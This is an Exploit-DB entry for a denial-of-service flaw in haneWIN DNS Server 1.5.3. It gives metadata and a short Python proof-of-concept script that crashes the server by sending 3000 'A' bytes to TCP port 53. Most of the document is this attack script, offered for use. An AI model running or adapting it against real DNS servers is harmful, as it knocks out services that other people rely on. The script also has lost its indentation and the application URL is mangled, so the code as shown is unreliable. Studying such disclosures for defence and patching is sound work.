haneWIN DNS Server 1.5.3 - Denial of Service

Author: sajith
type: dos
platform: windows
port: 53.0
date_added: 2014-01-17  
date_updated: 2014-01-17  
verified: 0  
codes: OSVDB-102272  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comdns153.exe  

raw file: 31014.py  
###########################################################
[~] Exploit Title: haneWIN DNS Server 1.5.3 - Denial of service
[~] Author: sajith
[~] version: haneWIN DNS Server 1.5.3
[~]Vendor Homepage: http://www.hanewin.net/
[~] vulnerable app link:http://www.hanewin.net/dns-e.htm
[~]Tested in windows Xp sp3
###########################################################
#POC by sajith shetty
import socket

target = "127.0.0.1"
port   = 53

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
buf = "A" * 3000
request = buf
s.send(request)
data = s.recv(1024)
print data

except:

print "DNS server is Down!"